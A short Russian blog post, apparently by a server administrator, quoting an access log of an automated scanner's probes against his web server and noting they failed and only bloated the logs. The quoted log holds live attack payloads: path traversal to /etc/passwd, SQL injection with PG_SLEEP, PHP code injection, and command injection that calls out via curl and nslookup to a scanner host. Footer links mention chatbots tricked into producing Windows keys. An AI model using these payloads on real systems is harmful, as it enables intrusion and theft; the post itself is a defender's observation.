"Кто стучится в дверь ко мне?"
trilirium — 04.04.2023 СВыдержанные места из
10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /NIKLib/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /${@print(md5(31337))}/small/ HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /_RSKD_/_docs/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /icons/small/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /icons/http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg/ HTTP/1.1" 404 281 "http://infoculture.rsl.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /LATQxF7Z'%20OR%20494=(SELECT%20494%20FROM%20PG_SLEEP(15))--/small/ HTTP/1.1" 404 254 "http://infoculture.rsl.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /icons/small'||sleep(27*1000)*wgjnig||'/ HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /icons/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "POST /xmlrpc.aspx HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /_RSKD_/_database/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /icons/^(%23$!@%23$)(()))******/ HTTP/1.1" 404 225 "http://infoculture.rsl.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /backup_infoculture.tgz HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /.dockerignore HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /icons/$(nslookup%20-q=cname%20hitueciwemxjwb85e8.bxss.me||curl%20hitueciwemxjwb85e8.bxss.me)/ HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /NIKLib/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /${@print(md5(31337))}\\/small/ HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /_RSKD_/_docs/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /epH4qy3T')%20OR%20432=(SELECT%20432%20FROM%20PG_SLEEP(15))--/small/ HTTP/1.1" 404 255 "http://infoculture.rsl.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /icons/small/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /icons/small\"||sleep(27*1000)*ghlzjz||\"/ HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /_RSKD_/_database/BB/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /icons/bxss.me%2ft%2fxss.html%3f%2500/ HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /_RSKD_/_database/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /NIKLib/althome/js/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /\"+\"A\".concat(70-3).concat(22*4).concat(100).concat(78).concat(115).concat(70)+(require\"socket\"%0aSocket.gethostbyname(\"hitdh\"+\"fwkextbp0eff2.bxss.me.\")[3].to_s)+\"/small/ HTTP/1.1" 404 415 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 10.251.249.211 - - [21/Mar/2023:12:50:55 +0300] "GET /.deployignore HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
Ну, и так далее. Я мог бы намного больше процитировать -- но идею вы поняли. )))
Всё это абсолютно неэффективно, за исключением одного: тупо жрёт дисковое пространство под логи.
Нормальный размер нашего недельного лога -- ~~10Mb, а тут накидали этой гадости аж за двести!
И всё равно, им полный облом. )))
Оставить комментарий
Популярные посты:
- Нейросеть Microsoft обманом заставили генерировать лицензионные ключи для Windows CNews.ru
- ChatGPT обманом заставили сгенерировать рабочий ключ активации для Windows 95 3DNews
- Активация Windows с помощью ChatGPT. Популярный чат-бот действительно выдал рабочий ключ iXBT.com - новости техники и технологий